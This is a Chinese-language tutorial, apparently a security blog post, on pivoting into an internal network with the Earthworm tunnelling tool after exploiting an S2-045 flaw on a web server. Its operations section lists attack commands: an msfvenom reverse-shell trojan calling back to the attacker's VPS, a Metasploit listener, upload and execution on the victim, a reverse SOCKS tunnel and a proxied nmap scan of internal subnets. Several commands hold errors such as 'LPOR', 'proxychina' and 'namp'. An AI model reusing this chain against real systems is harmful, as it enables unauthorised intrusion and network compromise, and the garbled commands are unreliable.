使用EW完成内网代理穿透
1.需求
当发现一台网站服务器存在S2-045漏洞时渗透进行到内网,常需要将流量代理到内网进行进一步扩展如:
- 端口扫描
- 端口转发
- 信息收集
.....
2.需求
- A1 - 192.168.1.1 - Kali - 本机
- A2 - 45.32.x.x - Kali - 公网攻击服务器
- V1 - 218.x.x.x - Centos - 网站服务器,对公网开放,80端口存在web应用,存在S2-045漏洞,路由可抵达10.10.1.0和10.10.10.3.0段。
3.工具介绍
实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要利用ew对模拟内网进行操作。
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,突破网络限制。
4.操作
利用msf制作linux木马:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=45.32.x.x LPOR=6789 -f elf>test.elf
公网vps设置监听:
use exploit/multi/handler
set payload Linux/x86/meterpreter/reverse_tcp
set lhost 45.32.x.x
set lport 6789
用s2-045利用工具将木马和EW传到V1(218.x.x.x - Centos - 网站服务器)并执行命令使木马运行并上线
V1在VPS上线后进入到shell在V1和A2之间搭建隧道:
V1:./ew_for_linux64 -s rssocks -d 45.32.x.x -e 1234
A2:./ew_for_linux64 -s rssocks -l 1111 -e 1234
在自己的A1上设置代理:
vi /etc/proxychina.conf
socks5 45.32.x.x 1111
在A2上查看V1的网络情况:
runget_local_subnets
在A1上对V1做信息收集:
proxychina namp -sV -Pn -p- 10.10.1.0
成功扫描到10.10.1.0和10.10.3.0网段的其他主机信息
5.总结
实战中的多样化场景可能更加复杂也可能比较简单,无法一一阐述,
内容都是基础,工具在使用上也无太多难处,关键在于弄清楚实战中目标内网数据流向,把复杂的大场景拆分成若干个小场景,使问题变得简单。
大家可能会觉得操作中MSF的使用对于这次内网穿透没有起到太大帮助,因为这个项目是次实战操作,所以准备充分一点,在后渗透过程中会用到
纸上得来终觉浅,绝知此事要躬行,多实操多思考,方能不断进步。

浙公网安备 33010602011771号